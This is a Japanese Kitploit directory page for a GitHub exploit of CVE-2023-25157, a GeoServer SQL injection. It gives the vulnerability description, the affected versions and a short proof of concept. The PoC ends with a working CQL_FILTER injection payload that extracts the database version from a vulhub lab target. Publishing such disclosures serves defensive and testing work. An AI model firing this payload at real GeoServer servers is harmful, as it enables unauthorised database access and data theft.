Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-25157 — CVE-2023-25157 エクスプロイト | Kitploit
ツール/GitHubGitHub/charis3306/cve-2023-25157
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubcharis3306/cve-2023-25157

CVE-2023-25157

CVE-2023-25157 エクスプロイト

リポジトリを見る
31年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

脆弱性の説明

ユーザー入力がフィルタリングされていないため、リモートの未認証攻撃者が不正なフィルター構文を構築し、GeoServerの字句解析をバイパスしてSQLインジェクションを引き起こし、サーバー上の機密情報を取得したり、データベースサーバーの権限を取得したりする可能性があります。

影響を受けるバージョン

GeoServer 2.20.x < 2.20.7

GeoServer 2.19.x < 2.19.7

GeoServer 2.18.x < 2.18.7

GeoServer 2.21.x < 2.21.4

GeoServer 2.22.x < 2.22.2

POC(概念実証)

利用可能な機能名の取得

検索

root@kitploit:~
/geoserver/ows?service=WFS&version=1.0.0&request=GetCapabilities

関連する利用可能な機能の利用可能な属性の取得

vulhub:example 機能名の関連属性を取得

root@kitploit:~
/geoserver/wfs?request=DescribeFeatureType&version=2.0.0&service=WFS&outputFormat=application/json&typeName=vulhub:example

root@kitploit:~
/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=vulhub:example&CQL_FILTER=strStartsWith(name,'x'')+=+true+and+1=(SELECT+CAST+((SELECT+version())+AS+INTEGER))+--+')+=+true

ツールをダウンロード